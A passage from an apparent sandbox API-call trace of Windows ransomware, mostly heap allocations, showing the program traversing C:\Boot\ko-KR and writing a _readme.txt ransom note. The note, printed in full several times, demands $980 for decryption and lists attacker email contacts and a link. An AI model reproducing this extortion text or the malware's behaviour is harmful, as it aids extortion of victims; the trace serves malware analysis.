Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.561] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.561] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.561] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.561] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.561] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.561] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.561] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.561] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.561] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.561] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.561] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.561] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.561] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.561] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.561] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.561] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.561] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.561] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.561] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.561] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.561] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.561] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.561] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.561] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.561] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.562] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.562] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.562] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.562] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.562] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.562] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.562] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.562] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.562] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.562] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.562] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.562] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.562] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.562] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.562] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.562] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.562] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.562] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.562] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.562] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.562] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.562] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.562] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.562] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.562] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.562] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.562] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.562] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.562] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.563] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.563] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.563] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.563] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.563] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.563] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.563] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.563] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.563] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.563] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.563] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.563] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.563] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.563] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.563] PathFindFileNameW (pszPath="C:\\Boot\\ko-KR\\") returned="ko-KR\\" [0227.563] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.563] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0227.563] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0227.563] PathFindFileNameW (pszPath="") returned="" [0227.563] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.563] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75000000 [0227.564] GetProcAddress (hModule=0x75000000, lpProcName="SHGetFolderPathW") returned 0x75085708 [0227.564] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x800) returned 0x325c3b0 [0227.564] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x325c3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0227.564] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x37a2b08 [0227.564] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.564] FreeLibrary (hLibModule=0x75000000) returned 1 [0227.564] PathAppendW (in: pszPath="C:\\Boot\\ko-KR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\ko-KR\\_readme.txt") returned 1 [0227.564] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.564] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.564] PathFileExistsW (pszPath="C:\\Boot\\ko-KR\\_readme.txt") returned 0 [0227.566] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x7d00) returned 0x37b0468 [0227.566] lstrcpyW (in: lpString1=0x37b0468, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" [0227.566] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0227.567] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3c18 [0227.567] CreateFileW (lpFileName="C:\\Boot\\ko-KR\\_readme.txt" (normalized: "c:\\boot\\ko-kr\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0227.567] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3c18 | out: hHeap=0x630000) returned 1 [0227.567] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b0468 | out: hHeap=0x630000) returned 1 [0227.567] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.567] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.567] FindFirstFileW (in: lpFileName="C:\\Boot\\ko-KR\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0227.567] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.567] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.568] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0227.568] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0227.568] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0227.568] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.568] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed800 | out: hHeap=0x630000) returned 1 [0227.568] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed800 [0227.568] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.568] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.568] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.568] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.568] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.568] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.568] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.568] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.568] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.568] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.568] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.568] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.568] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.568] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.568] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.568] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.568] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.568] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.568] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.569] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.569] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.569] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.569] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.569] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.569] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.569] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.569] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.569] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x325c3b0 [0227.569] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.569] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.569] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.569] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.569] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.569] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.569] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.569] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.569] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.569] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.569] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.569] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.569] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.569] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.569] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.569] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.569] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.569] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.569] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.569] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.570] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.570] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.570] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.570] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.570] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.570] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.570] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.570] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.570] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.570] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.570] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.570] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.570] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.570] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.570] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.570] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.570] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.570] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.570] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.570] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.570] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.570] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.570] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.570] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.570] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.570] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.570] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.570] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.570] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.571] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.571] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.571] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.571] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.571] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: 